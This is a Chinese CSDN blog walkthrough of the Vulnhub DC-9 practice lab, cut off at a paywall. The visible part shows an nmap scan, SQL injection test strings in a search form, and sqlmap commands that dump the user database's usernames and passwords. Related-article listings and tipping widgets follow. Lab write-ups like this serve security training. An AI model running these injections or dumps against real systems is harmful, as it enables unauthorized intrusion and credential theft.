Vulnhub靶机:DC-9渗透详细过程(DC系列完结)

已于 2022-03-29 17:04:57 修改
阅读量3.6k 收藏 8
点赞数 4
分类专栏: # 靶场WP 文章标签: 安全 php web安全
于 2022-03-28 21:58:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45996361/article/details/123807596
版权

前情提要

靶场地址:https://www.vulnhub.com/entry/dc-9,412/,DC-9是一个中级的靶场,需要具备以下前置知识:

  • 基础的Linux命令及操作
  • 基础的渗透测试工具使用(Kali / Parrot下的工具)

二珂说:DC系列的九个靶机就到此结束啦!!!后期会继续更新其他系列的靶机wp~感谢支持

信息收集

nmap -A -sV -p- -T4 192.168.132.156

image-20220325175311325

目前发现只开放80端口,去web页面搜索一下

有一处后台登陆、一处搜索处

在搜索处1' or 1=1#页面返回正常,1' or 1=2#报错,BP抓包发现是POST

输出文件:sql进入kali一把梭

SQLMAP

sqlmap -r sql --dbs --dump
sqlmap -r sql -D users -T UserDetails -C id,username,password --dump

最低0.47元/天 解锁文章
1erkeU
关注
  • 4
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
Vulnhub靶机渗透学习——DC-9
qq_45612828的博客
07-02 2985
Vulnhub靶机渗透学习——DC-9
DC-9靶机渗透
wwxxss
11-25 707
以上的信息收集,我没有发现什么实际的信息,只有两个端口,一个ssh端口被过滤,因此我们最后再访问一下网站发现两个有用的地方,一个可以存在表单,另一个是登录的网页。
靶机DC-9—WP
最新发布
m0_66638011的博客
06-15 785
DC系列靶机是一系列专门为渗透测试和网络安全实验室设计的虚拟机器。这些靶机提供了一系列不同的漏洞和攻击场景,使渗透测试者可以在这些环境下测试自的技能和工具。DC系列靶机包含多个不同的主题,例如各种操作系统的漏洞,Web应用程序安全和无线网络安全等。它们对初学者和专业人士都有很大的价值,因为它们可以帮助他们了解安全漏洞和如何利用它们进行渗透测试。之前更新到DC-4了,感觉这次DC-9会更有内涵,所以先进行DC-9的更新,中间的会进行补充。
DC-9靶机渗透详细流程
braty_的博客
02-09 803
DC-9靶机详细流程
DC-9靶机渗透测试
读书 买花 长大
05-21 537
DC-9
《Vulhub-DC-1靶场实战》
weixin_47118413的博客
07-06 2217
DC系列目前总共有9个靶机,本次靶机DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
DC-9靶机-简单谈一下端口敲门技术 (Port Knocking)
薛定谔嘚喵博客
05-23 1795
在打靶机DC-9时,爆破SSH时一直显示失败,经过查阅才知道原来是对端口做了“隐藏”,需要通过 Port Knocking 来主动开启,由于平时接触到的机会不多,所以这里简单记录一下,加强一下印象,也希望能帮助到大家。端口敲门是一种通过在一组预先指定的关闭端口上产生连接请求,从外部打开防火墙上的端口的方法。一旦收到正确地连接请求序列,防火墙规则就会被动态修改,以允许发送连接请求的主机通过特定端口进行连接。端口敲门的主要目的是。
DC-9靶机渗透测试详细教程
啊醒的博客
05-04 2773
DC-8靶机渗透测试详细教程
vulnhub靶场渗透练习详解——DC9
weixin_51011609的博客
08-19 2045
vulnhub靶场渗透练习详解——DC9
DC1-9靶机提权总结
问彡心的博客
09-27 1698
使用Drupal的漏洞查看能以root身份执行的文件列表结果显示有find命令通过find与系统命令结合,进入root身份的shell控制台。
DC-9靶机进行渗透测试
zll___的博客
03-24 490
DC-9靶机进行渗透测试
Vulnhub系列DC5靶场详解
weixin_50053818的博客
05-13 1632
文章目录环境文件包含突破点screen提权 环境 vulhub系列DC5靶场 VMware虚拟机 kali 文件包含突破点 根据目标靶机MAC地址得到靶机IP为192.168.43.160,直接上nmap扫描。 发现开放了80、111、36936端口,暂时只知道端口80是web站点,另外两个端口未知。其他无头绪,直接访问网页。 进入网页,一堆的英文,看了一下内容发现没有什么用,只有Contact页面有几个输入点,经过SQL注入和XSS测试,没有发现相关漏洞。 卡了半天没有找到什么突破点了,所以尝试
Vulhub-DC-2靶场通关攻略
weixin_51339377的博客
03-16 747
arp-scan -l nmap -sV -p- 192.168.109.140 也可以执行如下命令 可以探测目标主机是否存活 nmap -T4 -sP 192.168.109.140 也可以尝试如下的命令 -A是主动扫描 -p设置的是端口 -oN可以把结果输出到文件 结果保存在root目标下 nmap -T4 -A 192.168.109.140 -p 1-65535 -oN haha.txt 想要访问可以进入如下...
Vulhub漏洞环境使用教程
热门推荐
Sea_Sand息禅
04-21 1万+
Vulhub是一个比较全面的漏洞集合,收集了近年来许多的重要漏洞,以开源的形式呈现,以docker的形式进行环境配置,提供了更简单的漏洞复现,只需要简单的命令即可实现漏洞复现。 1、vulhub下载 下载地址:https://github.com/vulhub/vulhub 2、docker安装 apt-get install docker.io 安装后注意使用时启动docke:serv...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

1erkeU

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值